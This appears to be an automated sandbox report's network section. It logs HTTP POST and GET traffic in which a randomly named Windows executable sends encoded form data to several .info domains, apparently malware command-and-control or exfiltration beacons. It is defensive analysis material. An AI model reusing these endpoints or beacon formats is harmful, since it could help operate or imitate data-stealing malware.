                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 43 6a 63 70 7a 6a 52 4c 39 6c 32 5a 47 2b 47 55 6d 58 49 4e 4a 43 6f 33 72 42 54 73 79 38 77 47 79 4e 44 73 6a 46 46 36 70 61 59 79 63 73 67 4d 58 4c 37 61 51 67 64 45 2b 6a 37 47 6c 7a 4e 39 79 6d 44 32 4a 45 70 62 38 77 4c 52 4b 43 64 5a 4f 35 50 51 35 53 61 6c 33 39 59 74 53 76 46 74 46 36 54 48 72 7a 75 2b 70 65 64 6f 74 31 32 37 68 4f 73 30 77 79 47 59 6e 34 6a 6f 42 56 62 35 5a 44 38 68 30 71 4e 68 31 79 52 77 6d 57 38 79 35 33 6d 4f 32 53 43 49 32 61 39 6a 45 41 65 79 6d 36 62 7a 74 64 45 51 4c 65 31 74 32 47 71 45 41 4a 6e 66 38 69 72 4d 64 78 2b 74 64 62 61 71 6b 77 3d 3d
                                                                                                                          Data Ascii: V0=CjcpzjRL9l2ZG+GUmXINJCo3rBTsy8wGyNDsjFF6paYycsgMXL7aQgdE+j7GlzN9ymD2JEpb8wLRKCdZO5PQ5Sal39YtSvFtF6THrzu+pedot127hOs0wyGYn4joBVb5ZD8h0qNh1yRwmW8y53mO2SCI2a9jEAeym6bztdEQLe1t2GqEAJnf8irMdx+tdbaqkw==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.45002584.32.84.32804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:31.106359005 CET680OUTPOST /m320/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          Origin: http://www.truckgoway.info
                                                                                                                          Referer: http://www.truckgoway.info/m320/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 43 6a 63 70 7a 6a 52 4c 39 6c 32 5a 55 75 57 55 31 6b 51 4e 4f 69 6f 30 75 42 54 73 35 63 77 4b 79 4e 50 73 6a 41 68 71 70 49 4d 79 46 4e 51 4d 46 66 76 61 54 67 64 45 32 44 36 74 68 7a 4e 30 79 68 4c 2b 4a 46 6c 62 38 7a 33 52 4b 44 74 5a 4f 4f 62 54 6a 69 61 6e 2f 64 59 34 64 50 46 74 46 36 54 48 72 7a 36 55 70 66 35 6f 74 46 47 37 67 71 59 33 35 53 47 62 33 6f 6a 6f 46 56 61 79 5a 44 38 58 30 72 51 70 31 30 4e 77 6d 56 6f 79 35 6c 65 52 68 43 43 4f 79 61 38 71 45 53 43 36 70 49 58 35 74 4f 77 6a 4d 50 74 73 36 67 6e 65 52 34 47 49 75 69 50 2f 41 32 33 5a 51 59 6e 6a 2f 37 7a 41 66 46 72 53 79 34 4e 4e 77 6b 41 77 5a 43 6f 4b 79 45 4d 3d
                                                                                                                          Data Ascii: V0=CjcpzjRL9l2ZUuWU1kQNOio0uBTs5cwKyNPsjAhqpIMyFNQMFfvaTgdE2D6thzN0yhL+JFlb8z3RKDtZOObTjian/dY4dPFtF6THrz6Upf5otFG7gqY35SGb3ojoFVayZD8X0rQp10NwmVoy5leRhCCOya8qESC6pIX5tOwjMPts6gneR4GIuiP/A23ZQYnj/7zAfFrSy4NNwkAwZCoKyEM=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.45002684.32.84.32804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:34.225218058 CET10762OUTPOST /m320/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          Origin: http://www.truckgoway.info
                                                                                                                          Referer: http://www.truckgoway.info/m320/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 43 6a 63 70 7a 6a 52 4c 39 6c 32 5a 55 75 57 55 31 6b 51 4e 4f 69 6f 30 75 42 54 73 35 63 77 4b 79 4e 50 73 6a 41 68 71 70 49 30 79 5a 72 45 4d 58 6f 54 61 63 41 64 45 34 6a 37 4b 68 7a 4d 32 79 67 76 79 4a 46 34 75 38 31 7a 52 49 68 31 5a 65 37 33 54 74 53 61 6e 39 64 59 73 53 76 46 30 46 36 69 4f 72 7a 71 55 70 66 35 6f 74 47 4f 37 6b 2b 73 33 2f 53 47 59 6e 34 69 70 42 56 61 61 5a 44 30 48 30 6f 39 4c 31 43 39 77 6e 7a 49 79 34 51 79 52 69 69 43 4d 38 36 38 79 45 53 50 6b 70 49 36 47 74 4f 31 72 4d 50 4a 73 35 42 43 38 4a 70 2b 65 30 52 7a 67 62 32 66 6d 58 34 57 6a 30 4b 33 55 51 45 37 37 70 71 77 6a 79 56 4a 71 4c 7a 30 2b 7a 53 41 52 5a 4a 56 39 72 31 76 65 4b 2f 72 51 38 6d 6e 63 6a 37 31 4a 63 59 74 74 30 43 77 64 34 6c 68 59 61 73 44 4e 77 49 49 41 37 39 66 55 6b 53 64 58 74 71 73 44 53 54 2f 57 4a 39 42 6f 63 65 32 56 31 37 61 61 51 44 6c 53 38 45 48 36 54 6c 50 64 54 36 70 46 30 36 41 70 55 2f 39 4f 44 70 42 6d 33 39 47 55 65 39 57 46 78 74 70 74 64 4d 32 4e 58 59 43 71 41 4f 68 [TRUNCATED]
                                                                                                                          Data Ascii: V0=CjcpzjRL9l2ZUuWU1kQNOio0uBTs5cwKyNPsjAhqpI0yZrEMXoTacAdE4j7KhzM2ygvyJF4u81zRIh1Ze73TtSan9dYsSvF0F6iOrzqUpf5otGO7k+s3/SGYn4ipBVaaZD0H0o9L1C9wnzIy4QyRiiCM868yESPkpI6GtO1rMPJs5BC8Jp+e0Rzgb2fmX4Wj0K3UQE77pqwjyVJqLz0+zSARZJV9r1veK/rQ8mncj71JcYtt0Cwd4lhYasDNwIIA79fUkSdXtqsDST/WJ9Boce2V17aaQDlS8EH6TlPdT6pF06ApU/9ODpBm39GUe9WFxtptdM2NXYCqAOhcnfSaX/1Eim0Ma3TIhdenxXsQbyEP8+R3rG9jCQ+VOypqFrcyEiYvC8aLk+IHZMItOlBVEGkCEUG7d1IxbI5Gqyd3IKOZDtX4RTnlVhRmECgxKGpeksMvMHJKoEtsFuwMY3bXo97LAqcgWkVBD04ybE7Qff7m2LMHpO7droNnccD5kNGqlvT1yrvoXRG6+x9e2v5VFG3i6OxLUtpW+C0AUDke/Clw62Eow82fe3X2SO5Q2oZ0Fy6V0P4CpQ9wVHXyaHBypUgnhQhHXWMHbjgXq5h5GrQeLDE754l4bmXZDE68+Ps9zpXt8jQj+yzZyGkpaIg24tSVuUX+q7hojbMUpAXRIaZRs+Hm9twqb1AybHda24a3e1J3MlFQ93nnhGSLDXAp+u461tZA7kSeTiZKzfCBtNj/B+e+XUdzqdfopE0Ykoehp6I5PPkK1CeIdNYT3Vxw73z9OzEBOP3S+CFZesShA54p/mQCUOruUd8ERA88dnfeajXWgl7ArAlp/sQsnA2YKg2v2WdhmIYJweMeyNIskv4xyrvYBJioa68uZi8/q0+DVIpwdZCYW+L52sT5OXIBM5aUL6Yqyikc0w4NZ0oSb4AB96p1Zxwg7aglnXjvqduHl8U73yfU1R2GThzcMcJOMAnGrKyrmUDSlcmOiNZdtgYUxopxE [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.45002784.32.84.32804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:36.770253897 CET386OUTGET /m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:17:37.237879992 CET1236INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:37 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 9973
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Server: hcdn
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          x-hcdn-request-id: 252268993f3336709444ccabcdb2317a-bos-edge2
                                                                                                                          Expires: Wed, 15 Jan 2025 17:17:36 GMT
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                                                          Jan 15, 2025 18:17:37.237919092 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                                                          Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                                                          Jan 15, 2025 18:17:37.237932920 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                                                          Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                                                          Jan 15, 2025 18:17:37.238023043 CET672INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                          Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                                                          Jan 15, 2025 18:17:37.238034964 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                                                                          Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                                                                                          Jan 15, 2025 18:17:37.238095045 CET224INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                                                                          Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is
                                                                                                                          Jan 15, 2025 18:17:37.238106966 CET1236INData Raw: 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20 54 61 6b 65 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64 65 64 20 73 74 65 70 73 20 62 65 6c 6f 77 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 79 6f 75 72 20 6a 6f
                                                                                                                          Data Ascii: using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=domain-default-img.svg></div><div class=col-xs-12><div class=section-title>What's next?</div></div><div class="clearfix c
                                                                                                                          Jan 15, 2025 18:17:37.238117933 CET1116INData Raw: 65 6d 65 6e 74 20 70 61 67 65 20 6f 66 20 79 6f 75 72 20 48 6f 73 74 69 6e 67 65 72 20 61 63 63 6f 75 6e 74 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d
                                                                                                                          Data Ascii: ement page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){
                                                                                                                          Jan 15, 2025 18:17:37.238131046 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                                                                          Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                                                                          Jan 15, 2025 18:17:37.238140106 CET224INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                                                                                          Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g
                                                                                                                          Jan 15, 2025 18:17:37.238184929 CET660INData Raw: 3c 3d 75 3f 31 3a 75 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 75 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68
                                                                                                                          Data Ascii: <=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split(


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.450028213.171.195.105804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:42.351341009 CET675OUTPOST /he9k/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          Origin: http://www.aloezhealthcare.info
                                                                                                                          Referer: http://www.aloezhealthcare.info/he9k/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 35 4f 67 61 39 45 7a 6a 68 45 52 73 30 46 2f 6f 62 73 58 61 32 47 71 73 70 4b 34 4c 45 7a 64 76 44 31 42 74 63 42 6b 2b 67 7a 64 4c 4c 6c 31 41 68 4f 62 75 54 4d 7a 43 53 5a 47 50 70 32 30 70 52 44 77 6d 64 63 59 41 58 49 58 59 61 73 4f 35 36 51 7a 32 36 50 59 67 33 47 39 33 42 41 46 4c 59 4b 6e 71 4a 50 68 68 78 41 73 75 6e 73 52 59 39 6b 4b 7a 30 4a 52 73 4c 63 58 54 39 36 49 77 39 54 52 37 6c 4d 77 6b 6c 35 6a 65 70 66 51 6d 76 4f 35 77 59 75 4e 2b 30 35 55 55 56 49 75 71 58 2f 5a 5a 79 61 61 53 47 4b 72 4c 43 67 69 51 53 30 70 6a 52 58 4b 4d 65 65 33 63 73 53 32 59 44 77 3d 3d
                                                                                                                          Data Ascii: V0=5Oga9EzjhERs0F/obsXa2GqspK4LEzdvD1BtcBk+gzdLLl1AhObuTMzCSZGPp20pRDwmdcYAXIXYasO56Qz26PYg3G93BAFLYKnqJPhhxAsunsRY9kKz0JRsLcXT96Iw9TR7lMwkl5jepfQmvO5wYuN+05UUVIuqX/ZZyaaSGKrLCgiQS0pjRXKMee3csS2YDw==
                                                                                                                          Jan 15, 2025 18:17:42.949337006 CET309INHTTP/1.1 405 Not Allowed
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:42 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 157
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.450029213.171.195.105804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:44.957339048 CET695OUTPOST /he9k/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          Origin: http://www.aloezhealthcare.info
                                                                                                                          Referer: http://www.aloezhealthcare.info/he9k/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 35 4f 67 61 39 45 7a 6a 68 45 52 73 31 6d 6e 6f 65 50 2f 61 6a 32 71 74 73 4b 34 4c 4e 54 64 72 44 31 4e 74 63 46 39 31 68 42 35 4c 49 45 46 41 69 50 62 75 55 4d 7a 43 4b 4a 47 47 6d 57 31 72 52 44 4e 54 64 63 55 41 58 49 44 59 61 75 57 35 36 68 7a 31 37 66 59 69 6a 32 39 31 63 51 46 4c 59 4b 6e 71 4a 50 30 38 78 41 30 75 6e 66 35 59 73 78 32 77 71 5a 52 76 49 63 58 54 35 36 4a 37 39 54 52 56 6c 4e 73 65 6c 39 54 65 70 61 30 6d 32 2f 35 7a 54 75 4e 6b 35 5a 55 45 59 73 69 6c 4f 4e 64 59 74 4b 4f 4e 4c 36 7a 31 44 6d 76 4b 44 46 49 30 44 58 75 2f 44 5a 2b 6f 68 52 4c 52 59 79 47 49 78 55 65 6e 56 6a 39 4c 67 4c 6b 6f 7a 6a 51 54 64 54 49 3d
                                                                                                                          Data Ascii: V0=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hB5LIEFAiPbuUMzCKJGGmW1rRDNTdcUAXIDYauW56hz17fYij291cQFLYKnqJP08xA0unf5Ysx2wqZRvIcXT56J79TRVlNsel9Tepa0m2/5zTuNk5ZUEYsilONdYtKONL6z1DmvKDFI0DXu/DZ+ohRLRYyGIxUenVj9LgLkozjQTdTI=
                                                                                                                          Jan 15, 2025 18:17:45.532556057 CET309INHTTP/1.1 405 Not Allowed
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:45 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 157
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.450030213.171.195.105804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:47.511580944 CET10777OUTPOST /he9k/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          Origin: http://www.aloezhealthcare.info
                                                                                                                          Referer: http://www.aloezhealthcare.info/he9k/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
